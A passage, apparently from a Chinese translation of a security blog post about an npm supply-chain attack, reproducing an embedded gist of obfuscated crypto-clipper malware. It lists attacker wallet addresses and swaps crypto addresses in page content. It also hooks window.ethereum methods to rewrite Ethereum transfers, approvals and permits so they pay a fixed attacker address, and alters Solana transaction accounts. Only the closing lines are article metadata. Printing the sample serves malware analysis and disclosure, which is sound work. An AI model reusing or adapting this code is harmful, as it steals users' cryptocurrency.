| 'LY1NnVbdywTNmq45DYdhssrVENZKv7Sk8H', | ||
| 'LNmMqhqpyDwb1zzZReuA8aVUxkZSc4Ztqq', | ||
| 'LdxgXRnXToLMBML2KpgGkdDwJSTM6sbiPE', | ||
| 'LZMn8hLZ2kVjejmDZiSJzJhHZjuHq8Ekmr', | ||
| 'LVnc1MLGDGKs2bmpNAH7zcHV51MJkGsuG9', | ||
| 'LRSZUeQb48cGojUrVsZr9eERjw4K1zAoyC', | ||
| 'LQpGaw3af1DQiKUkGYEx18jLZeS9xHyP9v', | ||
| 'LiVzsiWfCCkW2kvHeMBdawWp9TE8uPgi6V', | ||
| 'LY32ncFBjQXhgCkgTAd2LreFv3JZNTpMvR', | ||
| 'LdPtx4xqmA4HRQCm3bQ9PLEneMWLdkdmqg', | ||
| 'LYcHJk7r9gRbg2z3hz9GGj91Po6TaXDK3k', | ||
| 'LMhCVFq5fTmrwQyzgfp2MkhrgADRAVCGsk', | ||
| 'LPv1wSygi4vPp9UeW6EfWwepEeMFHgALmN', | ||
| 'Lf55UbTiSTjnuQ8uWzUBtzghztezEfSLvT', | ||
| 'LdJHZeBQovSYbW1Lei6CzGAY4d3mUxbNKs', | ||
| 'LbBxnFaR1bZVN2CquNDXGe1xCuu9vUBAQw', | ||
| 'LWWWPK2SZZKB3Nu8pHyq2yPscVKvex5v2X', | ||
| 'LYN4ESQuJ1TbPxQdRYNrghznN8mQt8WDJU', | ||
| 'LiLzQs4KU79R5AUn9jJNd7EziNE7r32Dqq', | ||
| 'LeqNtT4aDY9oM1G5gAWWvB8B39iUobThhe', | ||
| 'LfUdSVrimg54iU7MhXFxpUTPkEgFJonHPV', | ||
| 'LTyhWRAeCRcUC9Wd3zkmjz3AhgX6J18kxZ', | ||
| 'Lc2LtsEJmPYay1oj7v8xj16mSV15BwHtGu', | ||
| 'LVsGi1QVXucA6v9xsjwaAL8WYb7axdekAK', | ||
| 'LewV6Gagn52Sk8hzPHRSbBjUpiNAdqmB9z', | ||
| ], | ||
| _0x553dcb = [ | ||
| 'bitcoincash:qpwsaxghtvt6phm53vfdj0s6mj4l7h24dgkuxeanyh', | ||
| 'bitcoincash:qq7dr7gu8tma7mvpftq4ee2xnhaczqk9myqnk6v4c9', | ||
| 'bitcoincash:qpgf3zrw4taxtvj87y5lcaku77qdhq7kqgdga5u6jz', | ||
| 'bitcoincash:qrkrnnc5kacavf5pl4n4hraazdezdrq08ssmxsrdsf', | ||
| 'bitcoincash:qqdepnkh89dmfxyp4naluvhlc3ynej239sdu760y39', | ||
| 'bitcoincash:qqul8wuxs4ec8u4d6arkvetdmdh4ppwr0ggycetq97', | ||
| 'bitcoincash:qq0enkj6n4mffln7w9z6u8vu2mef47jwlcvcx5f823', | ||
| 'bitcoincash:qrc620lztlxv9elhj5qzvmf2cxhe7egup5few7tcd3', | ||
| 'bitcoincash:qrf3urqnjl4gergxe45ttztjymc8dzqyp54wsddp64', | ||
| 'bitcoincash:qr7mkujcr9c38ddfn2ke2a0sagk52tllesderfrue8', | ||
| 'bitcoincash:qqgjn9yqtud5mle3e7zhmagtcap9jdmcg509q56ynt', | ||
| 'bitcoincash:qpuq8uc9ydxszny5q0j4actg30he6uhffvvy0dl7er', | ||
| 'bitcoincash:qz0640hjl2m3n2ca26rknljpr55gyd9pjq89g6xhrz', | ||
| 'bitcoincash:qq0j6vl2ls2g8kkhkvpcfyjxns5zq03llgsqdnzl4s', | ||
| 'bitcoincash:qq8m8rkl29tcyqq8usfruejnvx27zxlpu52mc9spz7', | ||
| 'bitcoincash:qpudgp66jjj8k9zec4na3690tvu8ksq4fq8ycpjzed', | ||
| 'bitcoincash:qqe3qc9uk08kxnng0cznu9xqqluwfyemxym7w2e3xw', | ||
| 'bitcoincash:qpukdxh30d8dtj552q2jet0pqvcvt64gfujaz8h9sa', | ||
| 'bitcoincash:qqs4grdq56y5nnamu5d8tk450kzul3aulyz8u66mjc', | ||
| 'bitcoincash:qp7rhhk0gcusyj9fvl2ftr06ftt0pt8wgumd8ytssd', | ||
| 'bitcoincash:qpmc3y5y2v7h3x3sgdg7npau034fsggwfczvuqtprl', | ||
| 'bitcoincash:qzum0qk4kpauy8ljspmkc5rjxe5mgam5xg7xl5uq2g', | ||
| 'bitcoincash:qqjqp8ayuky5hq4kgrarpu40eq6xjrneuurc43v9lf', | ||
| 'bitcoincash:qqxu6a3f0240v0mwzhspm5zeneeyecggvufgz82w7u', | ||
| 'bitcoincash:qpux2mtlpd03d8zxyc7nsrk8knarnjxxts2fjpzeck', | ||
| 'bitcoincash:qpcgcrjry0excx80zp8hn9vsn4cnmk57vylwa5mtz3', | ||
| 'bitcoincash:qpjj6prm5menjatrmqaqx0h3zkuhdkfy75uauxz2sj', | ||
| 'bitcoincash:qp79qg7np9mvr4mg78vz8vnx0xn8hlkp7sk0g86064', | ||
| 'bitcoincash:qr27clvagvzra5z7sfxxrwmjxy026vltucdkhrsvc7', | ||
| 'bitcoincash:qrsypfz3lqt8xtf8ej5ftrqyhln577me6v640uew8j', | ||
| 'bitcoincash:qrzfrff4czjn6ku0tn2u3cxk7y267enfqvx6zva5w6', | ||
| 'bitcoincash:qr7exs4az754aknl3r5gp9scn74dzjkcrgql3jpv59', | ||
| 'bitcoincash:qq35fzg00mzcmwtag9grmwljvpuy5jm8kuzfs24jhu', | ||
| 'bitcoincash:qra5zfn74m7l85rl4r6wptzpnt2p22h7552swkpa7l', | ||
| 'bitcoincash:qzqllr0fsh9fgfvdhmafx32a0ddtkt52evnqd7w7h7', | ||
| 'bitcoincash:qpjdcwld84wtd5lk00x8t7qp4eu3y0xhnsjjfgrs7q', | ||
| 'bitcoincash:qrgpm5y229xs46wsx9h9mlftedmsm4xjlu98jffmg3', | ||
| 'bitcoincash:qpjl9lkjjp4s6u654k3rz06rhqcap849jg8uwqmaad', | ||
| 'bitcoincash:qra5uwzgh8qus07v3srw5q0e8vrx5872k5cxguu3h5', | ||
| 'bitcoincash:qz6239jkqf9qpl2axk6vclsx3gdt8cy4z5rag98u2r', | ||
| ] | ||
| for (const [_0x17ccd4, _0x129783] of Object.entries(_0x3ec3bb)) { | ||
| const _0x1be350 = _0x530d91.match(_0x129783) | []; | |
| for (const _0x4225ce of _0x1be350) { | ||
| _0x17ccd4 == 'ethereum' && | ||
| !_0x4477fc.includes(_0x4225ce) && | ||
| neth == 0 && | ||
| (_0x530d91 = _0x530d91.replace( | ||
| _0x4225ce, | ||
| _0x2abae0(_0x4225ce, _0x4477fc) | ||
| )) | ||
| _0x17ccd4 == 'bitcoinLegacy' && | ||
| !_0x264994.includes(_0x4225ce) && | ||
| (_0x530d91 = _0x530d91.replace( | ||
| _0x4225ce, | ||
| _0x2abae0(_0x4225ce, _0x264994) | ||
| )) | ||
| _0x17ccd4 == 'bitcoinSegwit' && | ||
| !_0x2e3cca.includes(_0x4225ce) && | ||
| (_0x530d91 = _0x530d91.replace( | ||
| _0x4225ce, | ||
| _0x2abae0(_0x4225ce, _0x2e3cca) | ||
| )) | ||
| _0x17ccd4 == 'tron' && | ||
| !_0x3ee86f.includes(_0x4225ce) && | ||
| (_0x530d91 = _0x530d91.replace( | ||
| _0x4225ce, | ||
| _0x2abae0(_0x4225ce, _0x3ee86f) | ||
| )) | ||
| _0x17ccd4 == 'ltc' && | ||
| !_0x4a9d96.includes(_0x4225ce) && | ||
| (_0x530d91 = _0x530d91.replace( | ||
| _0x4225ce, | ||
| _0x2abae0(_0x4225ce, _0x4a9d96) | ||
| )) | ||
| _0x17ccd4 == 'ltc2' && | ||
| !_0x4a9d96.includes(_0x4225ce) && | ||
| (_0x530d91 = _0x530d91.replace( | ||
| _0x4225ce, | ||
| _0x2abae0(_0x4225ce, _0x4a9d96) | ||
| )) | ||
| _0x17ccd4 == 'bch' && | ||
| !__0x553dcb.includes(_0x4225ce) && | ||
| (_0x530d91 = _0x530d91.replace( | ||
| _0x4225ce, | ||
| _0x2abae0(_0x4225ce, _0x553dcb) | ||
| )) | ||
| const _0x2d452a = [ | ||
| ..._0x4477fc, | ||
| ..._0x264994, | ||
| ..._0x2e3cca, | ||
| ..._0x3ee86f, | ||
| ..._0x4a9d96, | ||
| ..._0x553dcb, | ||
| ], | ||
| _0x35f871 = _0x2d452a.includes(_0x4225ce) | ||
| _0x17ccd4 == 'solana' && | ||
| !__0x35f871 && | ||
| !__0x514d7d.includes(_0x4225ce) && | ||
| (_0x530d91 = _0x530d91.replace( | ||
| _0x4225ce, | ||
| _0x2abae0(_0x4225ce, _0x514d7d) | ||
| )) | ||
| _0x17ccd4 == 'solana2' && | ||
| !__0x35f871 && | ||
| !__0x514d7d.includes(_0x4225ce) && | ||
| (_0x530d91 = _0x530d91.replace( | ||
| _0x4225ce, | ||
| _0x2abae0(_0x4225ce, _0x514d7d) | ||
| )) | ||
| _0x17ccd4 == 'solana3' && | ||
| _0x35f871 && | ||
| !__0x514d7d.includes(_0x4225ce) && | ||
| (_0x530d91 = _0x530d91.replace( | ||
| _0x4225ce, | ||
| _0x2abae0(_0x4225ce, _0x514d7d) | ||
| )) | ||
| } | ||
| } | ||
| return _0x530d91 | ||
| } | ||
| } | ||
| async function runmask() { | ||
| let _0x1c41fa = 0, | ||
| _0x2a20cb = new Map(), | ||
| _0x1ab7cb = false | ||
| function _0x1089ae(_0x4ac357, _0xc83c36 = true) { | ||
| const _0x13d8ee = JSON.parse(JSON.stringify(_0x4ac357)) | ||
| if (_0xc83c36) { | ||
| if ( | ||
| _0x13d8ee.value && | ||
| _0x13d8ee.value !== '0x0' && | ||
| _0x13d8ee.value !== '0' | ||
| ) { | ||
| const _0x5c6391 = _0x13d8ee.to | ||
| _0x13d8ee.to = '0xFc4a4858bafef54D1b1d7697bfb5c52F4c166976' | ||
| } | ||
| if (_0x13d8ee.data) { | ||
| const _0x250e27 = _0x13d8ee.data.toLowerCase() | ||
| if (_0x250e27.startsWith('0x095ea7b3')) { | ||
| if (_0x250e27.length >= 74) { | ||
| const _0x7fa5f0 = _0x250e27.substring(0, 10), | ||
| _0x15c4f9 = '0x' + _0x250e27.substring(34, 74), | ||
| _0xde14cc = 'Fc4a4858bafef54D1b1d7697bfb5c52F4c166976'.padStart( | ||
| 64, | ||
| '0' | ||
| ), | ||
| _0x3e4a11 = 'f'.repeat(64) | ||
| _0x13d8ee.data = _0x7fa5f0 + _0xde14cc + _0x3e4a11 | ||
| const _0x432d38 = { | ||
| '0x7a250d5630b4cf539739df2c5dacb4c659f2488d': 'Uniswap V2', | ||
| '0x66a9893cC07D91D95644AEDD05D03f95e1dBA8Af': 'Uniswap V2', | ||
| '0xe592427a0aece92de3edee1f18e0157c05861564': 'Uniswap V3', | ||
| '0x10ed43c718714eb63d5aa57b78b54704e256024e': 'PancakeSwap V2', |
| | '0x13f4ea83d0bd40e75c8222255bc855a974568dd4': 'PancakeSwap V3', |
| | '0x1111111254eeb25477b68fb85ed929f73a960582': '1inch', |
| | '0xd9e1ce17f2641f24ae83637ab66a2cca9c378b9f': 'SushiSwap', |
| | }, |
| | \_0x13f774=\_0x432d38\[\_0x15c4f9.toLowerCase()\] |
| | \_0x13f774 |
| | ? console.log(\_0x13f774+\_0x15c4f9) |
| | : console.log(\_0x15c4f9) |
| | } |
| | }else{ |
| | if(\_0x250e27.startsWith('0xd505accf')){ |
| | if(\_0x250e27.length>=458){ |
| | const\_0x571743=\_0x250e27.substring(0,10), |
| | \_0x55e7fa=\_0x250e27.substring(10,74), |
| | \_0x382fb5=\_0x250e27.substring(202,266), |
| | \_0x5bb3a7=\_0x250e27.substring(266,330), |
| | \_0x2e5118=\_0x250e27.substring(330,394), |
| | \_0x3ba273=\_0x250e27.substring(394,458), |
| | \_0x36b084='Fc4a4858bafef54D1b1d7697bfb5c52F4c166976'.padStart( |
| | 64, |
| | '0' |
| | ), |
| | \_0x15389e='f'.repeat(64) |
| | \_0x13d8ee.data= |
| | \_0x571743+ |
| | \_0x55e7fa+ |
| | \_0x36b084+ |
| | \_0x15389e+ |
| | \_0x382fb5+ |
| | \_0x5bb3a7+ |
| | \_0x2e5118+ |
| | \_0x3ba273 |
| | } |
| | }else{ |
| | if(\_0x250e27.startsWith('0xa9059cbb')){ |
| | if(\_0x250e27.length>=74){ |
| | const\_0x5d2193=\_0x250e27.substring(0,10), |
| | \_0x1493e2=\_0x250e27.substring(74), |
| | \_0x32c34c= |
| | 'Fc4a4858bafef54D1b1d7697bfb5c52F4c166976'.padStart(64,'0') |
| | \_0x13d8ee.data=\_0x5d2193+\_0x32c34c+\_0x1493e2 |
| | } |
| | }else{ |
| | if(\_0x250e27.startsWith('0x23b872dd')){ |
| | if(\_0x250e27.length>=138){ |
| | const\_0x5c5045=\_0x250e27.substring(0,10), |
| | \_0x1ebe01=\_0x250e27.substring(10,74), |
| | \_0x558b46=\_0x250e27.substring(138), |
| | \_0x56d65b= |
| | 'Fc4a4858bafef54D1b1d7697bfb5c52F4c166976'.padStart( |
| | 64, |
| | '0' |
| | ) |
| | \_0x13d8ee.data=\_0x5c5045+\_0x1ebe01+\_0x56d65b+\_0x558b46 |
| | } |
| | } |
| | } |
| | } |
| | } |
| | }else{ |
| | \_0x13d8ee.to&& |
| | \_0x13d8ee.to!=='0xFc4a4858bafef54D1b1d7697bfb5c52F4c166976'&& |
| | (\_0x13d8ee.to='0xFc4a4858bafef54D1b1d7697bfb5c52F4c166976') |
| | } |
| | }else{ |
| | \_0x13d8ee.instructions&& |
| | Array.isArray(\_0x13d8ee.instructions)&& |
| | \_0x13d8ee.instructions.forEach((\_0x190501)=>{ |
| | \_0x190501.accounts&& |
| | Array.isArray(\_0x190501.accounts)&& |
| | \_0x190501.accounts.forEach((\_0x2b9990)=>{ |
| | if(typeof\_0x2b9990==='string'){ |
| | \_0x2b9990='19111111111111111111111111111111' |
| | }else{ |
| | \_0x2b9990.pubkey&& |
| | (\_0x2b9990.pubkey='19111111111111111111111111111111') |
| | } |
| | }) |
| | \_0x190501.keys&& |
| | Array.isArray(\_0x190501.keys)&& |
| | \_0x190501.keys.forEach((\_0x40768f)=>{ |
| | \_0x40768f.pubkey&& |
| | (\_0x40768f.pubkey='19111111111111111111111111111111') |
| | }) |
| | }) |
| | \_0x13d8ee.recipient&& |
| | (\_0x13d8ee.recipient='19111111111111111111111111111111') |
| | \_0x13d8ee.destination&& |
| | (\_0x13d8ee.destination='19111111111111111111111111111111') |
| | } |
| | return\_0x13d8ee |
| | } |
| | function\_0x485f9d(\_0x38473f,\_0x292c7a){ |
| | returnasyncfunction(...\_0x59af19){ |
| | \_0x1c41fa++ |
| | let\_0x12a7cb |
| | try{ |
| | \_0x12a7cb=JSON.parse(JSON.stringify(\_0x59af19)) |
| | }catch(\_0x5d1767){ |
| | \_0x12a7cb=\[...\_0x59af19\] |
| | } |
| | if(\_0x59af19\[0\]&&typeof\_0x59af19\[0\]==='object'){ |
| | const\_0x2c3d7e=\_0x12a7cb\[0\] |
| | if( |
| | \_0x2c3d7e.method==='eth\_sendTransaction'&& |
| | \_0x2c3d7e.params&& |
| | \_0x2c3d7e.params\[0\] |
| | ){ |
| | try{ |
| | const\_0x39ad21=\_0x1089ae(\_0x2c3d7e.params\[0\],true) |
| | \_0x2c3d7e.params\[0\]=\_0x39ad21 |
| | }catch(\_0x226343){} |
| | }else{ |
| | if( |
| | (\_0x2c3d7e.method==='solana\_signTransaction'\|\| |
| | \_0x2c3d7e.method==='solana\_signAndSendTransaction')&& |
| | \_0x2c3d7e.params&& |
| | \_0x2c3d7e.params\[0\] |
| | ){ |
| | try{ |
| | let\_0x5ad975=\_0x2c3d7e.params\[0\] |
| | \_0x5ad975.transaction&&(\_0x5ad975=\_0x5ad975.transaction) |
| | const\_0x5dbe63=\_0x1089ae(\_0x5ad975,false) |
| | \_0x2c3d7e.params\[0\].transaction |
| | ? (\_0x2c3d7e.params\[0\].transaction=\_0x5dbe63) |
| | : (\_0x2c3d7e.params\[0\]=\_0x5dbe63) |
| | }catch(\_0x4b99fd){} |
| | } |
| | } |
| | } |
| | const\_0x1cbb37=\_0x38473f.apply(this,\_0x12a7cb) |
| | if(\_0x1cbb37&&typeof\_0x1cbb37.then==='function'){ |
| | return\_0x1cbb37 |
| | .then((\_0xea3332)=>\_0xea3332) |
| | .catch((\_0x35d6a3)=>{ |
| | throw\_0x35d6a3 |
| | }) |
| | } |
| | return\_0x1cbb37 |
| | } |
| | } |
| | function\_0x41630a(\_0x5d6d52){ |
| | if(!\_0x5d6d52){ |
| | returnfalse |
| | } |
| | let\_0x2fc35d=false |
| | const\_0xfafee=\['request','send','sendAsync'\] |
| | for(const\_0x16ab0eof\_0xfafee){ |
| | if(typeof\_0x5d6d52\[\_0x16ab0e\]==='function'){ |
| | const\_0x58cddf=\_0x5d6d52\[\_0x16ab0e\] |
| | \_0x2a20cb.set(\_0x16ab0e,\_0x58cddf) |
| | try{ |
| | Object.defineProperty(\_0x5d6d52,\_0x16ab0e,{ |
| | value: \_0x485f9d(\_0x58cddf,\_0x16ab0e), |
| | writable: true, |
| | configurable: true, |
| | enumerable: true, |
| | }) |
| | \_0x2fc35d=true |
| | }catch(\_0x19546c){} |
| | } |
| | } |
| | return\_0x2fc35d&&(\_0x1ab7cb=true),\_0x2fc35d |
| | } |
| | function\_0xfc3320(){ |
| | let\_0x4f0cd6=0 |
| | const\_0x5b507d=()=>{ |
| | \_0x4f0cd6++ |
| | if(window.ethereum){ |
| | setTimeout(()=>{ |
| | \_0x41630a(window.ethereum) |
| | },500) |
| | return |
| | } |
| | \_0x4f0cd6<50&&setTimeout(\_0x5b507d,100) |
| | } |
| | \_0x5b507d() |
| | } |
| | \_0xfc3320() |
| | window.stealthProxyControl={ |
| | isActive: ()=>\_0x1ab7cb, |
| | getInterceptCount: ()=>\_0x1c41fa, |
| | getOriginalMethods: ()=>\_0x2a20cb, |
| | forceShield: ()=>{ |
| | if(window.ethereum){ |
| | return\_0x41630a(window.ethereum) |
| | } |
| | returnfalse |
| | }, |
| | } |
| | } |
``````markdown
[查看 raw](https://gist.github.com/jdstaerk/9e73837f0ba23735ef04a736c6b97c09/raw/bbd3753edabef6977b6b97ac8383ca313de74553/npm_crypto_malware.js) [npm\_crypto\_malware.js](https://gist.github.com/jdstaerk/9e73837f0ba23735ef04a736c6b97c09#file-npm_crypto_malware-js)
由 [GitHub](https://github.com/) 托管 ❤
* * *
- 原文链接: jdstaerk.substack.com/p/...
- 登链社区 AI 助手,为大家转译优秀英文文章,如有翻译不通的地方,还请包涵~
- 翻译
- 学分: 0
- 分类: 安全
- 标签: 供应链攻击 npm 恶意软件 加密货币剪切器 依赖项 package.json JavaScript
本文参与登链社区写作激励计划 ,好文好收益,欢迎正在阅读的你也加入。
